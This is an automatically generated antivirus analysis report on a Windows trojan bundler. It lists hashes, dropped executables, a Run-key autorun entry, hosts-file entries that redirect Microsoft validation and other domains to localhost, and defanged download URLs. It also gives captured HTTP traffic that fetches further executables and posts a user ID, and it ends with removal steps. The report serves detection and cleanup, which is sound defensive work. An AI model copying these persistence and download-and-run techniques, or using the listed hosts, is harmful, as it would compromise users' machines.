Application.Bundler.Temonde.HT_e4a1e48948
HEUR:Trojan.Win32.Generic (Kaspersky), Application.Bundler.Temonde.HT (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: e4a1e489480deb3f41e78f13b5c3a2b9
SHA1: fda732803fbc5629eb0aacac6c799c23d451d3ed
SHA256: db99cfe09b6e891097168754eac8fe8c39eb55d0f43f94e47d8ebf1b7e983510
SSDeep: 49152:3mlvp6tLWa5E8gu3vmXOTTWvqAhpu6xZgSqQ:
Size: 2353152 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: Igor Pavlov
Created at: 2017-02-19 12:13:02
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
No processes have been created.
The Application injects its code into the following process(es):
%original file name%.exe:3380
sM1ER3x0n9.exe:2924
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:3380 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe (195092 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9ENU9N67ZuZ.exe (67748 bytes)
C:\Windows\System32\drivers\etc\hosts (174 bytes)
The process sM1ER3x0n9.exe:2924 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
Registry activity
The process %original file name%.exe:3380 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "18/03/2017"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
"Product" = "diskpower"
"channel" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e4a1e489480deb3f41e78f13b5c3a2b9_RASMANCS]
"ConsoleTracingMask" = "4294901760"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process sM1ER3x0n9.exe:2924 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sM1ER3x0n9_RASMANCS]
"EnableFileTracing" = "0"
To run itself automatically each time Windows is booted, the Application adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"XWK0O1HE6U" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 8b21a1050fd7d0abd67916868ea28af0 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe |
| 62316e35da8eff3f8d6ac5eaa03f30f7 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9ENU9N67ZuZ.exe |
HOSTS file anomalies
The Application modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses before DNS is consulted.
The modified file is 1038 bytes in size. The following entries were added to the hosts file:
| IP | Host name |
|---|---|
| 127.0.0.1 | validation.sls.microsoft.com |
| 127.0.0.1 | cpm.paneladmin.pro |
| 127.0.0.1 | publisher.hmdiadmingate.xyz |
| 127.0.0.1 | distribution.hmdiadmingate.xyz |
| 127.0.0.1 | hmdicrewtracksystem.xyz |
| 127.0.0.1 | beautifllink.xyz |
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Y
Product Name: YZOC06Z
Product Version: 2.6.8.4
Legal Copyright: Copyright (c) 9273
Legal Trademarks:
Original Filename: SxxW2X3.exe
Internal Name: SxxW2X3.exe
File Version: 2.6.8.4
File Description: YZOC06
Comments: YZOC06Z
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 2162880 | 2163200 | 4.1705 | 9e2824a1b5fc660e8e1f235dc2d074b5 |
| .rsrc | 2179072 | 188860 | 188928 | 3.23759 | 60324a0eefb7888e1ddb6315327fcf56 |
| .reloc | 2375680 | 12 | 512 | 0.070639 | 57c7d628ae673c1e75dc87c85be61e7d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://asiasoftwaretools.com/get/3/wizzcaster_v2.exe | |
| hxxp://wizzcaster.com/api/v5/config | |
| hxxp://wizzcaster.com/api/v5/link | |
| hxxp://asiasoftwaretools.com/get/4/remote.exe | |
| teredo.ipv6.microsoft.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /get/4/remote.exe HTTP/1.1
Host: asiasoftwaretools.com
HTTP/1.1 200 OK
Date: Sat, 18 Mar 2017 19:21:38 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Sat, 18 Mar 2017 19:21:37 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=554085fc9d663d57b6f830d4b5de76b7c76d55fe; expires=Sat, 18-Mar-2017 21:21:37 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Sat, 18 Mar 2017 19:21:38 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=124abeb98d3c250b4e92a848832d22fd433263c2; expires=Sat, 18-Mar-2017 21:21:38 GMT; Max-Age=7200; path=/; httponly
Content-Length: 67
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/bestoffersfortoday.com\/redirect\/57a764d042bf8"}
GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: asiasoftwaretools.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 18 Mar 2017 19:21:35 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
The Application connects to the servers at the following location(s):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe (195092 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9ENU9N67ZuZ.exe (67748 bytes)
C:\Windows\System32\drivers\etc\hosts (174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"XWK0O1HE6U" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sM1ER3x0n9.exe"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.